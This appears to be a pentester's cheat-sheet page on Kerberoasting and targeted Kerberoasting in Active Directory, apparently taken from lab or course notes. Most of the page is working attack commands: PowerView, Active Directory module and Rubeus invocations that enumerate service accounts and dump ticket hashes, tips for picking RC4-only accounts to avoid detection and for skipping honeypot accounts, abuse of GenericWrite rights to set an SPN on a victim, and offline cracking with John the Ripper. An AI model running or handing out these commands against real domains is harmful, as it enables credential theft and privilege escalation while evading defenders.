kerberoasting

Kerberoasting

Methodology

Enumerate what user account running as a service account we want to kerberoast.
Make sure it's not a honey pot account.
Make sure is a user made account, we don't want machine accounts since they have long passwords.
If OPSEC is needed kerberoast RC4-only accounts and add a delay between requesting tickets.
Kerberoast the user account.
Make sure we get back a RC4 hash and not an AES256 hash.
Crack the ticket.

Powershell

[!INFO] Remember to follow the Powershell methodology

PowerView

Find users that have an SPN set

Get-DomainUser -SPN | select cn, serviceprincipalname

Find users that have an SPN set and are RC4-only

Get-DomainUser -SPN -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes | 
Where-Object {
    # Accounts that explicitly only support RC4 (0x17)
    ($_.'msds-supportedencryptiontypes' -eq 4) -or
    # Accounts with no encryption type specified (default to RC4)
    ($_.'msds-supportedencryptiontypes' -eq $null) -or
    # Accounts with encryption type set to 0 (default to RC4)
    ($_.'msds-supportedencryptiontypes' -eq 0)
} | Format-Table samaccountname,serviceprincipalname,msds-supportedencryptiontypes

Request a ticket with SPN

Request-SPNTicket -SPN "HTTP/eyrie.north.sevenkingdoms.local" | Select-Object -ExpandProperty hash

Request a ticket with account name

Get-DomainUser -Identity "sansa.stark" -SPN | Get-DomainSPNTicket | Select-Object -ExpandProperty hash

Get all SPN account hashes. WARNING: EXTREMELY NOSIY!

Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty hash | Out-File -FilePath .\spn_hashes.txt

ActiveDirectory module

Find users that have an SPN set

Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Binaries

[!INFO] Remember to follow the binaries methodology

Rubeus

Request a ticket

Rubeus.exe kerberoast /stats
Rubeus.exe kerberoast /user:serviceaccount /simple

RC4-Only account (Avoids downgrade detection, skips AES supported tickets)

Rubeus.exe kerberoast /stats /rc4opsec
Rubeus.exe kerberoast /user:serviceaccount /simple /rc4opsec

Get all SPN account hashes. WARNING: EXTREMELY NOISY!

Rubeus.exe kerberoast /simple
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt

Ticket Cracking

https://www.openwall.com/john/k/john-1.9.0-jumbo-1-win64.zip

john.exe

Targeted Kerberoasting

If we have sufficient rights (GenericAll/GenericWrite), a target user's SPN can be set to anything (unique in the domain) instead of changing the password.

Methodology

Check if we have Generic All/Generic Write over another user by checking groups it belongs to.
Check if the user already has an SPN.
Set the SPN.
Kerberoast the user account.
Make sure we get back a RC4 hash and not an AES256 hash.
Crack the ticket.

Search for GenericAll/GenericWrite:

Find-InterestingDomainAcl -ResolveGUIDs | 
Where-Object {
    ($_.ActiveDirectoryRights -match "GenericAll|GenericWrite") -and
    ($_.IdentityReferenceName -match "StudentUsers")
} | Select-Object ObjectDN,ActiveDirectoryRights,IdentityReferenceName

Check if the user has an SPN

Get-DomainUser -Identity supportXuser | select serviceprincipalname

Set the SPN

Set-DomainObject -Identity supportXuser -Set @{serviceprincipalname='us/myspnX'} -Verbose

Request the ticket

Rubeus.exe kerberoast /user:supportXuser /simple /rc4opsec

Crack the ticket

john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txt

Previousgmsa Nextlaps

Last updated 1 month ago